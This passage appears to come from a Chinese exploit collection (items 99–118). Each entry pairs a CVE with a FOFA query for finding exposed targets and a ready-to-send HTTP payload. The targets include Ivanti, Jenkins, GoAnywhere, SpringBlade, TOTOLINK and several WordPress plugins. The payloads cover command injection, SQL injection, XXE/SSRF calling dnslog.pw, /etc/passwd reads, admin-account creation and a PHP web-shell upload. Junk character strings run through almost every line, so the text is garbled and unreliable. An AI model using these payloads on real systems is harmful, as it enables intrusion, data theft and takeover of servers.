: A$ x" q9 b. H" W9 E: W, J5 d! }# H6 v% H- L: y3 L- h* V
99. Ncast盈可视高清智能录播系统busiFacade RCE' I5 e+ Y# M- a+ L1 @3 Y
CVE-2024-0305- X* ^% M7 `" U# o3 s1 K
FOFA:app="Ncast-产品" && title=="高清智能录播系统"; K( R+ x( ?# C F# \0 g1 m
POST /classes/common/busiFacade.php HTTP/1.1 8 b. e1 a0 t V, t8 Y* H: @7 KHost: 192.168.40.130:8080# e7 h3 T1 M7 t" R. i. n! D a% s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 T* R2 q( L+ [1 J# s
Connection: close ( s7 t4 ]' ^# q UContent-Length: 154$ _' O) ]4 b E
Accept: */*8 w. H# N$ ]' o( y
Accept-Encoding: gzip, deflate ; F! S, O8 Q) K& R/ k# N ^3 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 ! e" u5 l8 O- e' w& Y% qContent-Type: application/x-www-form-urlencoded; charset=UTF-8 8 y" G+ v* L. H+ pX-Requested-With: XMLHttpRequest/ y* \( l. V9 H& @
% S$ M0 z6 {' Q" w4 s
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D2 f4 y. f) i0 D5 l0 F- ?# T8 z
% z" s M, j L$ M, P2 H" M0 k; m! G, y+ u
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传- \' |+ @' h1 y
CVE-2024-0352 + S) p) {8 M% y/ P% qFOFA:icon_hash="874152924" + }/ a! p8 v* jPOST /api/file/formimage HTTP/1.18 X9 z) u. O! |9 G9 r9 a
Host: 192.168.40.130 0 Y1 K, Y& m+ v N! X* TUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 ; j9 O7 h! {7 s5 V# fConnection: close7 D5 j" P6 p/ [# h% `) g! n
Content-Length: 2017 z# o/ m1 A6 R* d3 Z7 Z. ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei" T$ `- k5 O* C0 F9 z6 ^* g
Accept-Encoding: gzip * N) K1 P- l2 k9 V/ U: I / y0 {% d% z$ M0 ?+ \5 s1 s------WebKitFormBoundarygcflwtei 9 G0 ^ V1 t5 ~" k2 VContent-Disposition: form-data; name="file";filename="IE4MGP.php" : l6 Z. h- A0 S9 m, g7 [Content-Type: application/x-php" c) s# w: K' i( C1 N
8 `* n2 A4 N, Z/ [2ayyhRXiAsKXL8olvF5s4qqyI2O ' Q+ [6 F5 {' V# D------WebKitFormBoundarygcflwtei-- : m/ x q& x+ ]/ ? " t; B, @, V# z6 I s! l! @' m: T& u, _! z
101. ivanti policy secure-22.6命令注入 % ]9 n- q i) \3 D6 iCVE-2024-21887 ) k$ b9 L4 G6 q& C1 ]FOFA:body="welcome.cgi?p=logo" `: c1 x1 {: u8 D! B
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1, @" @/ u4 G H9 o2 Z5 U0 O* g
Host: x.x.x.xx.x.x.x ' ?; z- M" y. u+ cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 a8 @7 f) N" q; Z: B9 a, S
Connection: close % ~% L( `- I8 W. t. t, V3 H; XAccept-Encoding: gzip: ~4 A% Z0 f, o& f( B/ V
2 t% L& S0 `- f8 w0 v: {+ g# q- M; b! e0 V6 \! I5 P
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行3 d# E/ x0 m; Z8 J6 `' \. V& d* Q- s
CVE-2024-218939 m- R% o% Q& i' O0 L7 c5 B
FOFA:body="welcome.cgi?p=logo" + h. i% P0 k0 L4 C: j& VPOST /dana-ws/saml20.ws HTTP/1.1) U9 |0 v8 L; S
Host: x.x.x.x 1 @5 Q8 G* N y2 ^9 l- N% p+ T! aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 7 q% }3 ~9 o E' l" ZConnection: close 6 \- j) W6 p1 \8 B# ^) W* OContent-Length: 792* ~7 L' ^& G1 u: \1 u' `; E1 |% K- a
Accept-Encoding: gzip" `$ R' T( N" G( X. r7 X
- S, U1 C! e3 a* m9 R! |
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope> 4 A; C- k( a3 m: b% I! X5 }& J* \0 ?) k% q$ ^# {
103. Ivanti Pulse Connect Secure VPN XXE' G! g' I8 S2 k* d- _; N, p% Q
CVE-2024-22024; f1 M' D* A. l( J% K' E
FOFA:body="welcome.cgi?p=logo" 5 f1 x+ j2 G3 [2 L' M0 z% }POST /dana-na/auth/saml-sso.cgi HTTP/1.1! a' n) h" o+ N0 r
Host: 192.168.40.130:111 " o$ `9 h2 ~( r. l$ I8 m7 d/ _4 ]User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 $ B c' s' Z( c. DConnection: close/ n: e/ F1 o2 `/ _9 j: {& J
Content-Length: 204) h: T8 ^* j# E8 f- i
Content-Type: application/x-www-form-urlencoded : g) T, s! I J/ gAccept-Encoding: gzip _8 X; o8 c+ p- z; m k) j& }- R* Q; b6 |; t* V+ n% v. O. L
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg== - j4 l) Z% l, [9 }" q1 ~% m 5 \8 b: z# c* |$ a1 D. ?3 X. _4 [5 j7 V
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下 n! t! d4 L9 `. S3 \1 t<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r> 9 U. @0 }9 k& e& v 6 G: K) k! L, J, ~' w1 m3 h! m; w" v
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露 2 Z5 S: s/ B* Q' RCVE-2024-0569- V3 \1 z; B1 U. s. i7 L9 z
FOFA:title="TOTOLINK" l1 D8 E9 w+ B9 i' ~; I; {; X- qPOST /cgi-bin/cstecgi.cgi HTTP/1.1 . l8 L5 N) Z. U" c0 V) ]: H) THost:192.168.0.16 X: \( Y, P8 S# _/ F1 e# F Z+ |
Content-Length:41 , y) `) I$ P' o$ u3 [& MAccept:application/json,text/javascript,*/*;q=0.01 * s3 A I- h( G4 o! I% [0 fX-Requested-with: XMLHttpRequest$ t6 V! W# ]8 n% C
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.365 ]0 U$ E; h0 k. p! f* J* I& j
Content-Type: application/x-www-form-urlencoded:charset=UTF-81 T, b3 \% a5 k, l/ F9 \
Origin: http://192.168.0.1* ]! F; k, ]4 h' @
Referer: http://192.168.0.1/advance/index.html?time=1671152380564 " P& k3 J0 \# t3 |( S) P0 m1 HAccept-Encoding:gzip,deflate6 Y9 M' @ T7 A' t4 p
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7 ) l0 E- _1 ]. c4 G7 [- UConnection:close , R3 n: c: y0 u1 Z0 R! d, P: J2 T4 E" t/ e) p
{ 8 a4 P' Z. o5 M9 w/ P) e4 G8 @5 i"topicurl":"getSysStatusCfg", ! v5 c( q3 @6 }0 l" e1 O"token":"" ' ?; c5 e; r; T; P6 J3 V; G} 4 @/ D& Y' D( x6 o# b2 w : d# K- k8 _( z6 w# G! A$ i3 e105. SpringBlade v3.2.0 export-user SQL 注入( a) t+ x5 w6 O o ~' X: L" D# z7 ?
FOFA:body="https://bladex.vip" " S2 i/ [4 |& R, {' N9 ?& I+ R) Uhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1 p# @; ?& s) ^# Y' F$ E1 J- L
0 b4 ^; }& _" q8 U) R" l106. SpringBlade dict-biz/list SQL 注入+ j2 Q. {1 f2 w( g3 g# S; [3 _
FOFA:body="Saber 将不能正常工作"' z. B- v8 c4 }6 b% V# {0 F' V# Z
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1- T) j/ c; d' N# h5 n
Host: your-ip 8 m, f: M: D# U" P0 }+ mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 & p: e! ]4 a- O/ l/ \3 C' x$ RBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A ; x2 e/ m$ ]+ @. y0 z" ~1 r& QAccept-Encoding: gzip, deflate' Y' c8 Z4 v) t$ i' G1 ]7 }3 b
Accept-Language: zh-CN,zh;q=0.9) i3 Y4 Z+ e) o, \
Connection: close |6 J& r+ E% r6 \5 ]* q
0 ^3 {! |+ C3 j5 l& o, `; X
( b; a( O; y( v* ?, W3 n2 D0 y2 ?
107. SpringBlade tenant/list SQL 注入5 G2 X- T- r% m. y/ H+ l
FOFA:body="https://bladex.vip" 1 x `4 ?4 Q" @; v. ?GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1 ! `3 Q7 [3 V7 a/ v+ fHost: your-ip" |: \5 F" q1 W. O" U/ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 & O# c% I: F) {6 yBlade-Auth:替换为自己的 " o; j+ a: j. b$ M9 ~Connection: close 5 s; @" M& G r9 ?9 N" v4 I. L; S- W* r w/ {, q) u+ e$ W
/ T% ?" X7 y+ R8 ]( E3 V* l
108. D-Tale 3.9.0 SSRF" b; |- ]* D3 H) p/ P. ^3 T
CVE-2024-21642 7 L$ x' _2 {# f0 AFOFA:"dtale/static/images/favicon.png"' J7 A) J. g1 d- _6 e
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1 / E) D# [7 u l5 |Host: your-ip - ^$ q( v- V1 S/ _( ]. IAccept: application/json, text/plain, */* + `& e9 U1 L+ c" Y) s& rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 $ u `$ u5 o) P/ K+ d2 PAccept-Encoding: gzip, deflate) v b& O% S0 F4 {/ h% }/ s
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 # ]' X6 D7 @9 G! X' g/ AConnection: close ( D3 Z0 ~8 {. O5 f0 ^; [1 l. K* }5 m* V
+ `: M: w$ {! Y/ l1 l6 _5 P. z6 T
109. Jenkins CLI 任意文件读取) u3 C5 ]- k C
CVE-2024-23897# c) f# F3 F$ X( ] E
FOFA:header="X-Jenkins"! q2 P' z9 n, k, q
POST /cli?remoting=false HTTP/1.15 c3 ^/ r" w( {; L9 R
Host:* t4 E& J( [+ U7 K6 p% _# G
Content-type: application/octet-stream ; z% ^2 H( u! }' F! RSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92 . @' E, m! o9 S" F2 ~" f8 q, XSide: upload5 p& ]* ^3 s/ U5 k- C
Connection: keep-alive + j- |. C E9 ?* v! G4 vContent-Length: 163 ( T7 ?3 D" G% G; Y9 [" N1 E" Y( i Y7 b/ ?) Z+ @" a' c6 ab'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03' . ]% t' z6 t, p; U, v2 Q & N8 l- t( b' { , t8 w0 g J1 X9 m# C) X) O) A. U% i8 SPOST /cli?remoting=false HTTP/1.1, q% X8 C# n" Q6 ]: b' p
Host:1 i: a* k8 j! y& I+ I
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92# f9 P, E) k) u2 a# {* L& Q9 c
download + C: t3 ^- S1 o% m d0 Y$ j t& {Content-Type: application/x-www-form-urlencoded 7 Q7 R$ ?* c6 `/ V% {0 RContent-Length: 06 Z$ o/ d8 A3 j' _. b/ J* Q
) n7 ~2 [2 F' v$ |9 J" \; h
7 D8 B2 f% R4 s0 x6 Y/ o8 tERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin/ W0 G% k- F5 J% J
java -jar jenkins-cli.jar help 9 u# b3 J7 e; o2 L[COMMAND] ( R( Y9 V& i# {, [0 [Lists all the available commands or a detailed description of single command. ! f5 W0 l) O2 w6 g$ @- L7 O COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)* m$ e: Y, X9 `% f8 k. n
4 z: p: v5 H2 u' l; e- f- u* I8 k* @, s
110. Goanywhere MFT 未授权创建管理员 6 b- E# f9 l( \; V* MCVE-2024-02041 N3 D4 ^6 a1 C
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"7 e3 l6 J3 [: C$ ]" {+ G2 |
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1 1 F& G' }, g0 c5 [9 G U4 o$ sHost: 192.168.40.130:8000 4 y. m) y# i+ }User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 . J3 _- C/ `! n' `# A* AConnection: close 0 W0 G3 @6 m `6 l) oAccept: */* ! J: K% {3 Q2 \5 }: G4 y+ l/ j) f$ ~Accept-Language: en + h% }0 F9 G0 G( l- |Accept-Encoding: gzip & P# H$ T9 l& s - K# A. g6 Z* }3 o6 [) f2 p - N6 y& ]8 c: A ]3 P111. WordPress Plugin HTML5 Video Player SQL注入 ( e) q- ^: s) j5 dCVE-2024-1061- M+ [, V, {6 F. m/ e4 y* O+ I! s+ d
FOFA:"wordpress" && body="html5-video-player" ! G6 ^7 O0 b A1 mGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1 1 t& T; o. C4 y i. D! y0 NHost: 192.168.40.130:112 8 D# j7 @* G! ]# S6 F3 OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 5 T1 |5 ?3 c0 k2 }9 k1 aConnection: close7 h- j* C9 ?$ j5 B0 s* [* S
Accept: */*: ^- ?0 g2 H. x$ a7 J( m
Accept-Language: en 2 |( D: ~ l& zAccept-Encoding: gzip ! h1 X, ]$ I8 N! W2 \/ Z0 [ : ^) F, q; v9 a4 u* h9 ]9 D+ q( d+ G% Z: ~$ D# r: M
112. WordPress Plugin NotificationX SQL 注入 4 [/ I0 r& V$ t/ r7 fCVE-2024-1698! M$ o# C) U7 y
FOFA:body="/wp-content/plugins/notificationx" 4 ?2 C- T) v7 f* M3 U6 EPOST /wp-json/notificationx/v1/analytics HTTP/1.1 8 B) f5 _/ e2 k" iHost: {{Hostname}} 1 m S# @" J0 c$ P5 g zContent-Type: application/json& }/ o; d2 \' T U* q% d
9 c) q& B8 B' Y( K0 K{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"} . g T* u; ~8 D8 `: ]3 B9 I# |% b# G q% I z! h
# F1 l6 n7 O2 D. @0 f( l8 s
113. WordPress Automatic 插件任意文件下载和SSRF% Q: ]3 }1 |: r6 Y& c
CVE-2024-27954 + w" m; T$ `' p2 }6 |FOFA:"/wp-content/plugins/wp-automatic"$ _' v, x& G* _/ I X- X
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1' |) W+ n- q+ g9 B. u3 E
Host: x.x.x.x + w% o( a5 Z% L/ jUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36/ y* A+ G* j/ C& ?5 _' R
Connection: close 1 l H6 w& M+ R: T& ]( u8 e BAccept: */* 2 f- f; o; O! @+ j5 b& D6 h6 BAccept-Language: en + ]( O" T$ M# J! sAccept-Encoding: gzip+ o2 g2 W2 `+ O ^
7 n. S2 x; E$ r9 n ( s7 W$ I* v4 Y: |114. WordPress MasterStudy LMS插件 SQL注入; v L# S! K( D/ y
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"7 ?6 ^( h# g% v6 L* f! L; u
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1. ?: s5 E6 W% A4 L
Host: your-ip : f1 M) D. l) H+ |# l4 @# iUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 " l& n9 _7 D- D; ^: NAccept-Charset: utf-8& I! C: E8 a4 G/ V5 m
Accept-Encoding: gzip, deflate% d; r3 }0 t; A( N: \% b+ ?
Connection: close 0 P$ X5 N9 ]# |6 L/ ~# r% m' a7 U; ^& J2 a
) B4 X2 |- {6 k a! [
115. WordPress Bricks Builder <= 1.9.6 RCE8 K0 |5 z. d9 c: W% p/ u* v5 }. H
CVE-2024-25600 - I4 W2 w' X9 Y6 B/ HFOFA: body="/wp-content/themes/bricks/"9 J k5 r8 X8 R1 r
第一步,获取网站的nonce值 Z6 V$ o4 M: j9 V: V' m1 g$ n7 k7 y0 {GET / HTTP/1.1 , e4 G% Z1 r" r( U" Z$ @2 D4 YHost: x.x.x.x # Q" p2 d& ^/ S, ^9 _User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 % M- m# m8 d; M) JConnection: close , G8 w3 a! ?" Q# V& @0 IAccept-Encoding: gzip " R: y3 I' W9 M7 U1 `. r 3 n, U; H8 \! _, G" ~2 b' H ( I3 }2 x* G5 I第二步替换nonce值,执行命令 2 B3 \0 E- {$ N# H4 \. {! JPOST /wp-json/bricks/v1/render_element HTTP/1.1 $ V3 R2 ^" m1 B0 W7 lHost: x.x.x.x9 h+ z8 N+ C" Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 ' Y3 g0 l1 v' U" y' ?( ^0 |Connection: close ! `( d: t( D- @' F) X: |Content-Length: 356$ v4 F9 i3 ~& u
Content-Type: application/json; ]) Q5 @; |9 F. }% U, _
Accept-Encoding: gzip . C& ~5 ^7 e9 X D0 U* {1 m1 a9 I1 x9 e1 l
{ 8 m6 D% w, l) C( Q, U6 v) _* \"postId": "1", " Y2 T4 q. D: F) E) _/ y: k "nonce": "第一步获得的值",; Y4 Y1 i+ x+ t4 m. N
"element": {/ _% a4 L! e# y) A7 I+ w7 l# v- `- o% i
"name": "container",% V1 v& _* F$ {
"settings": { 4 { n* ?* @" @7 B' f. Q "hasLoop": "true",0 B: ~ E" w2 v$ V
"query": {# a; \ x( N- z! Q
"useQueryEditor": true, 7 J. m) g& c2 n0 H "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",' w: J* v/ w- J9 T
"objectType": "post") R Y4 D7 J! m9 x2 `9 ~2 b* v
}1 Q+ m7 L% K/ j4 D% _) H$ p. V
} $ N) L+ N" E* |8 n; j+ a: m } Q* H$ U, U* o
} 4 \+ }* f* @7 n2 j# c5 O% P 3 m6 K/ c$ D& j6 {) k# ]4 O1 I! w! Z" B2 f9 D! _( D
116. wordpress js-support-ticket文件上传/ Z& R+ p& Z+ P
FOFA:body="wp-content/plugins/js-support-ticket" % K5 D) G, e) n4 s' t1 IPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1 ; ]2 l ^! j0 j+ c% h2 {' FHost:2 k5 p' ^7 B+ `7 {5 Q6 w' u
Content-Type: multipart/form-data; boundary=--------767099171% @0 r: C t1 O4 f) L0 l
User-Agent: Mozilla/5.0 ^+ _ U; g4 K3 V% r ' ]3 I( {* p7 E; A----------767099171) s) `: b6 R- [
Content-Disposition: form-data; name="action"4 o6 j& H4 ~1 D: Y% M6 g% O1 w3 [
configuration_saveconfiguration + V2 Q% M/ z( |3 w# M% {----------767099171 . p; ?" u+ d( x: c) ^# q7 C: EContent-Disposition: form-data; name="form_request"8 F% Y* u8 x' u; T
jssupportticket % \) p( p x% v: @+ i----------767099171 9 H2 N! Z! _! d5 `, T) ~Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"$ G0 X: @& ^- }8 W
Content-Type: image/png 3 R- A, @5 f" x S8 \# q2 R----------767099171-- ) O: Y* M5 @' v/ E a/ w + ?; h4 n: W- r, V3 [" s8 O4 a8 ]7 z' H2 `
117. WordPress LayerSlider插件SQL注入 # g3 h/ O# I3 o5 b! B! ]7 Dversion:7.9.11 – 7.10.0 . n4 ` H( u/ I3 r0 sFOFA:body="/wp-content/plugins/LayerSlider/" 0 Q7 y8 C, H% Y9 m" @: HGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1 4 P; ]% K, |7 g# R2 S- s; H$ C/ ^Host: your-ip, N7 m0 m" u% W' y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% F* o2 P* l c" y) O' k: Z8 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 9 p( }3 @8 Y! O/ Q, AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 ) g/ f7 _3 u- d, r( s+ | k7 CAccept-Encoding: gzip, deflate, br 6 N- r; s6 F' a5 c2 G2 HConnection: close - T' f2 H, D I" CUpgrade-Insecure-Requests: 1 % v+ N: M2 n% b7 n0 ]) { 1 ^7 D. j2 ~& j: t& T2 h. W n : w* ?& V8 z4 R4 D118. 北京百绰智能S210管理平台uploadfile.php任意文件上传 " B6 M s) X5 ZCVE-2024-0939" A, G6 i' b5 h
FOFA:title="Smart管理平台"# X7 n. }- s! j$ O' H
POST /Tool/uploadfile.php? HTTP/1.1& a8 | q8 G4 N" ~
Host: 192.168.40.130:8443- Y3 ?' E3 X1 v
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8: A }1 [8 `9 ]4 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 ( D& v+ K# ~" D6 M+ I6 Q/ I: K+ E0 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + R$ c0 N: T$ ` g2 P* FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) n, k1 e9 @2 W
Accept-Encoding: gzip, deflate $ u7 V9 l5 a& oContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887 * _$ L8 G i* E" J3 A& u& @+ hContent-Length: 405 4 O; t9 M4 w7 k, i1 r" rOrigin: https://192.168.40.130:8443" r0 R, h* P% O
Referer: https://192.168.40.130:8443/Tool/uploadfile.php $ V0 @6 f7 o3 dUpgrade-Insecure-Requests: 1 ' `/ P# | h- d5 tSec-Fetch-Dest: document / b5 \ n1 R# g8 J1 q8 sSec-Fetch-Mode: navigate : V: @, E( S4 J2 u9 E& d: k7 ~Sec-Fetch-Site: same-origin 0 e; e+ @; r1 {2 x( W# X* Q: \Sec-Fetch-User: ?1 9 V- C# ^# f. W, @5 ~/ nTe: trailers ( D. t/ i( g/ ]9 AConnection: close E6 p4 n# t; A' K$ j) J- G W) X
' y" ~9 e5 V$ J8 K+ s2 Q
-----------------------------13979701222747646634037182887- G Z8 B2 s. |3 U" \) B
Content-Disposition: form-data; name="file_upload"; filename="contents.php" ! M8 J6 n5 k, y$ c% I" WContent-Type: application/octet-stream( l% J+ z; a# E5 p; Q4 L/ P
: U2 Q) k# ?7 |5 {<?php$ n- z3 Z- Z @. ]2 w. @& e
system($_POST["passwd"]); + b v/ j7 E9 w?> ) d/ y$ [$ ]4 ?# q7 \8 [-----------------------------13979701222747646634037182887 1 Q' X. o, s( d7 ~( ]1 c- Z- RContent-Disposition: form-data; name="txt_path" , s8 J; z7 A. l6 l' O. p: ^ `+ R, q% e
/home/src.php. u8 k% O' D& U- |( {, m; y2 j
-----------------------------13979701222747646634037182887-- 3 S" A) N+ l2 q8 o$ D; N% N% C! X, D/ {) D) a
L+ \4 d: e }, ]+ b) c; Jinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')1 U7 o6 A7 p6 j8 P